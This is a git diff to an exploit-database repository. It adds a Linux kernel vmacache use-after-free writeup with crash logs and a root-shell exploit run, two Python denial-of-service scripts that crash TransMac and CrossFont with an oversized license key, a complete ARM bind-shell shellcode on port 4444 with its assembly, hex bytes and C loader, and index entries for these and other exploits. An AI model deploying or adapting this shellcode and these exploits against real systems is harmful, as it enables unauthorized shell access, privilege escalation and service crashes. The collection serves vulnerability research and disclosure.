diff --git a/exploits/hardware/webapps/45487.txt b/exploits/hardware/webapps/45487.txt index 64a0c9366..b383ef8ae 100644 --- a/exploits/hardware/webapps/45487.txt +++ b/exploits/hardware/webapps/45487.txt @@ -4,13 +4,14 @@ # Vendor Homepage: https://www.ricoh.com/ # Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/all-in-one-printers/mp-305sp.html # Software: RICOH Printer -# Product Version: MP 305+ +# Product Version: MP 305+, MP C1803 JPN, MP C6503 Plus, MP C307 # Vulernability Type: Code Injection # Vulenrability: HTML Injection and Stored XSS # CVE: -# On the RICOH Aficio MP 305+ printer, HTML Injection and Stored XSS vulnerabilities have been discovered -# in the area of adding addresses via the entryNameIn parameter to /web/entry/en/address/adrsSetUserWizard.cgi. +# On the RICOH Aficio MP 305+ printer and other affected models, HTML Injection and Stored XSS +# vulnerabilities have been discovered in the area of adding addresses via the entryNameIn +# parameter to /web/entry/en/address/adrsSetUserWizard.cgi. # HTTP POST Request : diff --git a/exploits/linux/local/45497.txt b/exploits/linux/local/45497.txt new file mode 100644 index 000000000..134868eb1 --- /dev/null +++ b/exploits/linux/local/45497.txt @@ -0,0 +1,130 @@ +Since commit 615d6e8756c8 ("mm: per-thread vma caching", first in 3.15), +Linux has per-task VMA caches that contain up to four VMA pointers for +fast lookup. VMA caches are invalidated by bumping the 32-bit per-mm +sequence number mm->vmacache_seqnum; when the sequence number wraps, +vmacache_flush_all() scans through all running tasks and wipes the +VMA caches of all tasks that share current's mm. + +In commit 6b4ebc3a9078 ("mm,vmacache: optimize overflow system-wide +flushing", first in 3.16), a bogus fastpath was added that skips the +invalidation on overflow if current->mm->mm_users==1. This means that +the following sequence of events triggers a use-after-free: + +[A starts as a singlethreaded process] +A: create mappings X and Y (in separate memory areas + far away from other allocations) +A: perform repeated invalidations until + current->mm->vmacache_seqnum==0xffffffff and + current->vmacache.seqnum==0xfffffffe +A: dereference an address in mapping Y that is not + paged in (thereby populating A's VMA cache with + Y at seqnum 0xffffffff) +A: unmap mapping X (thereby bumping + current->mm->vmacache_seqnum to 0) +A: without any more find_vma() calls (which could + happen e.g. via pagefaults), create a thread B +B: perform repeated invalidations until + current->mm->vmacache_seqnum==0xfffffffe +B: unmap mapping Y (thereby bumping + current->mm->vmacache_seqnum to 0xffffffff) +A: dereference an address in the freed mapping Y + (or any address that isn't present in the + pagetables and doesn't correspond to a valid + VMA cache entry) + +A's VMA cache is still at sequence number 0xffffffff from before the +overflow. The sequence number has wrapped around in the meantime, back +to 0xffffffff, and A's outdated VMA cache is considered to be valid. + + +I am attaching the following reproduction files: + +vmacache-debugging.patch: Kernel patch that adds some extra logging for + VMA cache internals. +vma_test.c: Reproducer code +dmesg: dmesg output of running the reproducer in a VM + +In a Debian 9 VM, I've tested the reproducer against a 4.19.0-rc3+ +kernel with vmacache-debugging.patch applied, configured with +CONFIG_DEBUG_VM_VMACACHE=y. + +Usage: + +user@debian:~/vma_bug$ gcc -O2 -o vma_test vma_test.c -g && ./vma_test +Segmentation fault + + +Within around 40 minutes, I get the following warning in dmesg: + +============================================= +[ 2376.292518] WARNING: CPU: 0 PID: 1103 at mm/vmacache.c:157 vmacache_find+0xbb/0xd0 +[ 2376.296813] Modules linked in: btrfs xor zstd_compress raid6_pq +[ 2376.300095] CPU: 0 PID: 1103 Comm: vma_test Not tainted 4.19.0-rc3+ #161 +[ 2376.303650] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 +[ 2376.305796] RIP: 0010:vmacache_find+0xbb/0xd0 +[ 2376.306963] Code: 48 85 c0 74 11 48 39 78 40 75 1f 48 39 30 77 06 48 39 70 08 77 19 83 c2 01 83 fa 04 41 0f 44 d1 83 e9 01 75 c7 31 c0 c3 f3 c3 <0f> 0b 31 c0 c3 65 48 ff 05 98 97 9b 6a c3 90 90 90 90 90 90 90 0f +[ 2376.311881] RSP: 0000:ffffa934c1e3bec0 EFLAGS: 00010283 +[ 2376.313258] RAX: ffff8ac7eaf997d0 RBX: 0000133700204000 RCX: 0000000000000004 +[ 2376.315165] RDX: 0000000000000001 RSI: 0000133700204000 RDI: ffff8ac7f3820dc0 +[ 2376.316998] RBP: ffff8ac7f3820dc0 R08: 0000000000000001 R09: 0000000000000000 +[ 2376.318789] R10: 0000000000000000 R11: 0000000000000000 R12: ffffa934c1e3bf58 +[ 2376.320590] R13: ffff8ac7f3820dc0 R14: 0000000000000055 R15: ffff8ac7e9355140 +[ 2376.322481] FS: 00007f96165ca700(0000) GS:ffff8ac7f3c00000(0000) knlGS:0000000000000000 +[ 2376.324620] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 +[ 2376.326101] CR2: 0000133700204000 CR3: 0000000229d28001 CR4: 00000000003606f0 +[ 2376.327906] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 +[ 2376.329819] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 +[ 2376.331571] Call Trace: +[ 2376.332208] find_vma+0x16/0x70 +[ 2376.332991] ? vfs_read+0x10f/0x130 +[ 2376.333852] __do_page_fault+0x191/0x470 +[ 2376.334816] ? async_page_fault+0x8/0x30 +[ 2376.335776] async_page_fault+0x1e/0x30 +[ 2376.336746] RIP: 0033:0x555e2a2b4c37 +[ 2376.337600] Code: 05 80 e8 9c fc ff ff 83 f8 ff 0f 84 ad 00 00 00 8b 3d 81 14 20 00 e8 48 02 00 00 48 b8 00 40 20 00 37 13 00 00 bf 37 13 37 13 00 01 31 c0 e8 cf fc ff ff 48 83 ec 80 31 c0 5b 5d 41 5c c3 48 +[ 2376.342085] RSP: 002b:00007ffd505e8d30 EFLAGS: 00010206 +[ 2376.343334] RAX: 0000133700204000 RBX: 0000000100000000 RCX: 00007f9616102700 +[ 2376.345133] RDX: 0000000000000008 RSI: 00007ffd505e8d18 RDI: 0000000013371337 +[ 2376.346834] RBP: 00007f96165e4000 R08: 0000000000000000 R09: 0000000000000000 +[ 2376.348889] R10: 0000000000000001 R11: 0000000000000246 R12: 0000000100000000 +[ 2376.350570] R13: 00007ffd505e8ea0 R14: 0000000000000000 R15: 0000000000000000 +[ 2376.352246] ---[ end trace 995fa641c5115cfb ]--- +[ 2376.353406] vma_test[1103]: segfault at 133700204000 ip 0000555e2a2b4c37 sp 00007ffd505e8d30 error 6 in vma_test[555e2a2b4000+2000] +============================================= + +The source code corresponding to the warning, which is triggered because +the VMA cache references a VMA struct that has been reallocated to +another process in the meantime: + +#ifdef CONFIG_DEBUG_VM_VMACACHE + if (WARN_ON_ONCE(vma->vm_mm != mm)) + break; +#endif + + +################################################################################ + + +Attaching an ugly exploit for Ubuntu 18.04, kernel linux-image-4.15.0-34-generic at version 4.15.0-34.37. It takes about an hour to run before popping a root shell. Usage: First compile with ./compile.sh, then run ./puppeteer. Example run: + +user@ubuntu-18-04-vm:~/vmacache$ ./puppeteer +Do Sep 20 23:55:11 CEST 2018 +puppeteer: old kmsg consumed +got map from child! +got WARNING +got RSP line: 0xffff9e0bc2263c60 +got RAX line: 0xffff8c7caf1d61a0 +got RDI line: 0xffff8c7c214c7380 +reached WARNING part 2 +got R8 line: 0xffffffffa7243680 +trace consumed +offset: 0x110 +fake vma pushed +suid file detected, launching rootshell... +we have root privs now... +Fr Sep 21 00:48:00 CEST 2018 +root@ubuntu-18-04-vm:~/vmacache# + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45497.zip \ No newline at end of file diff --git a/exploits/windows_x86/dos/45493.py b/exploits/windows_x86/dos/45493.py new file mode 100755 index 000000000..0b6885451 --- /dev/null +++ b/exploits/windows_x86/dos/45493.py @@ -0,0 +1,25 @@ +# Exploit Title: TransMac 12.2 - Denial of Service (PoC) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-09-26 +# Software Link: http://www.acutesystems.com/tmac/tmsetup.exe +# Tested Version: 12.2 +# Tested on OS: Windows 7 32-bit +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt". Copy the content from "exploit.txt". +# Now start the program. When inside the program click "Enter Key" +# Now paste the contents of "exploit.txt" into the fields:"License Key/Code" +# Click "OK" and you will see a crash. + +#!/usr/bin/python + +buffer = "A" * 4000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86/dos/45494.py b/exploits/windows_x86/dos/45494.py new file mode 100755 index 000000000..19b79b0f2 --- /dev/null +++ b/exploits/windows_x86/dos/45494.py @@ -0,0 +1,25 @@ +# Exploit Title: CrossFont 7.5 - Denial of Service (PoC) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-09-26 +# Software Link: http://www.acutesystems.com/cfnt/cfsetup.exe +# Tested Version: 7.5 +# Tested on OS: Windows 7 32-bit +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt". Copy the content from "exploit.txt". +# Now start the program. When inside the program click "Enter Key" +# Now paste the contents of "exploit.txt" into the fields:"License Key/Code" +# Click "OK" and you will see a crash. + +#!/usr/bin/python + +buffer = "A" * 4000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 4fae1e9c6..b84dff0c7 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6135,6 +6135,8 @@ id,file,description,date,author,type,platform,port 45486,exploits/multiple/dos/45486.html,"WebKit - 'WebCore::RenderLayer::updateDescendantDependentFlags' Use-After-Free",2018-09-25,"Google Security Research",dos,multiple, 45488,exploits/multiple/dos/45488.html,"WebKit - 'WebCore::SVGTextLayoutAttributes::context' Use-After-Free",2018-09-25,"Google Security Research",dos,multiple, 45489,exploits/multiple/dos/45489.html,"WebKit - 'WebCore::RenderTreeBuilder::removeAnonymousWrappersForInlineChildrenIfNeeded' Use-After-Free",2018-09-25,"Google Security Research",dos,multiple, +45493,exploits/windows_x86/dos/45493.py,"TransMac 12.2 - Denial of Service (PoC)",2018-09-26,"Gionathan Reale",dos,windows_x86, +45494,exploits/windows_x86/dos/45494.py,"CrossFont 7.5 - Denial of Service (PoC)",2018-09-26,"Gionathan Reale",dos,windows_x86, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10001,6 +10003,7 @@ id,file,description,date,author,type,platform,port 45467,exploits/windows_x86/local/45467.py,"Easy PhoroResQ 1.0 - Buffer Overflow",2018-09-25,"Cemal Cihad ÇİFTÇİ",local,windows_x86, 45479,exploits/solaris/local/45479.rb,"Solaris - 'EXTREMEPARR' dtappgather Privilege Escalation (Metasploit)",2018-09-25,Metasploit,local,solaris, 45492,exploits/windows_x86/local/45492.py,"Faleemi Desktop Software 1.8.2 - 'Device alias' Local Buffer Overflow (SEH)",2018-09-25,"Gionathan Reale",local,windows_x86, +45497,exploits/linux/local/45497.txt,"Linux - VMA Use-After-Free via Buggy vmacache_flush_all() Fastpath",2018-09-26,"Google Security Research",local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index f5f2db590..83e9cfe70 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -916,3 +916,4 @@ id,file,description,date,author,type,platform 45441,shellcodes/linux_x86/45441.c,"Linux/x86 - Egghunter (0x50905090) + sigaction() Shellcode (27 bytes)",2018-09-20,"Valerio Brussani",shellcode,linux_x86 45458,shellcodes/arm/45458.c,"Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-09-24,"Ken Kitahara",shellcode,arm 45459,shellcodes/arm/45459.c,"Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) + sigaction() Shellcode (52 Bytes)",2018-09-24,"Ken Kitahara",shellcode,arm +45495,shellcodes/arm/45495.c,"Linux/ARM - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 Bytes)",2018-09-26,"Ken Kitahara",shellcode,arm diff --git a/shellcodes/arm/45495.c b/shellcodes/arm/45495.c new file mode 100644 index 000000000..adf028fcd --- /dev/null +++ b/shellcodes/arm/45495.c @@ -0,0 +1,135 @@ +/* +# Title: Linux/ARM - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 Bytes) +# Date: 2018-09-26 +# Tested: armv7l (Raspberry Pi 3 Model B+) +# Author: Ken Kitahara + +[System Information] +pi@raspberrypi:~ $ uname -a +Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux +pi@raspberrypi:~ $ lsb_release -a +No LSB modules are available. +Distributor ID: Raspbian +Description: Raspbian GNU/Linux 9.4 (stretch) +Release: 9.4 +Codename: stretch +pi@raspberrypi:~ $ + + +[Source Code] +pi@raspberrypi:~ $ cat bindshell.s +.section .text +.global _start + +_start: + .ARM + add lr, pc, #1 + bx lr + + .THUMB + // socket(2, 1, 0) + mov r0, #2 + mov r1, #1 + eor r2, r2, r2 + mov r7, #200 + add r7, #81 + svc #1 + mov r3, r0 + + // bind(fd, &sockaddr, 16) + adr r1, struct_addr + strb r2, [r1, #1] + str r2, [r1, #4] + mov r2, #16 + add r7, r7, #1 + svc #1 + + // listen(host_sockid, 2) + mov r0, r3 + mov r1, #2 + add r7, r7, #2 + svc #1 + + // accept(host_sockid, 0, 0) + mov r0, r3 + eor r1, r1, r1 + eor r2, r2, r2 + add r7, r7, #1 + svc #1 + + mov r3, r0 + mov r1, #3 + mov r7, #63 + + duploop: + // dup2(client_sockid, 2) + // -> dup2(client_sockid, 1) + // -> dup2(client_sockid, 0) + mov r0, r3 + sub r1, r1, #1 + svc #1 + cmp r1, r2 + bne duploop + + // execve("/bin/sh", 0, 0) + adr r0, spawn + strb r1, [r0, #7] + mov r7, #11 + svc #1 + +struct_addr: +.ascii "\x02\xff" +.ascii "\x11\x5c" +.byte 1,1,1,1 + +spawn: +.ascii "/bin/shX" +pi@raspberrypi:~ $ as -o bindshell.o bindshell.s && ld -N -o bindshell bindshell.o +pi@raspberrypi:~ $ objcopy -O binary bindshell bindshell.bin +pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' bindshell.bin && echo +\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1\x02\x20\x01\x21\x52\x40\xc8\x27\x51\x37\x01\xdf\x03\x1c\x0d\xa1\x4a\x70\x4a\x60\x10\x22\x01\x37\x01\xdf\x18\x1c\x02\x21\x02\x37\x01\xdf\x18\x1c\x49\x40\x52\x40\x01\x37\x01\xdf\x03\x1c\x03\x21\x3f\x27\x18\x1c\x01\x39\x01\xdf\x91\x42\xfa\xd1\x03\xa0\xc1\x71\x0b\x27\x01\xdf\x02\xff\x11\x5c\x01\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58 +pi@raspberrypi:~ $ + + +[Operation Test] +(1) Compile and execute this PoC. +pi@raspberrypi:~ $ gcc -fno-stack-protector -z execstack loader-bind.c -o loader-bind +pi@raspberrypi:~ $ ./loader-bind +Shellcode Length: 92 + +(2) Connect to 127.0.0.1:4444/TCP from another terminal. +pi@raspberrypi:~ $ nc -vv 127.0.0.1 4444 +Connection to 127.0.0.1 4444 port [tcp/*] succeeded! +id +uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi) +exit +^C +pi@raspberrypi:~ $ + +*/ + +#include +#include + +unsigned char sc[] = \ +"\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1" +"\x02\x20\x01\x21\x52\x40\xc8\x27" +"\x51\x37\x01\xdf\x03\x1c\x0d\xa1" +"\x4a\x70\x4a\x60\x10\x22\x01\x37" +"\x01\xdf\x18\x1c\x02\x21\x02\x37" +"\x01\xdf\x18\x1c\x49\x40\x52\x40" +"\x01\x37\x01\xdf\x03\x1c\x03\x21" +"\x3f\x27\x18\x1c\x01\x39\x01\xdf" +"\x91\x42\xfa\xd1\x03\xa0\xc1\x71" +"\x0b\x27\x01\xdf\x02\xff\x11\x5c" +"\x01\x01\x01\x01\x2f\x62\x69\x6e" +"\x2f\x73\x68\x58"; + +void main() +{ + printf("Shellcode Length: %d\n", strlen(sc)); + + int (*ret)() = (int(*)())sc; + + ret(); +} \ No newline at end of file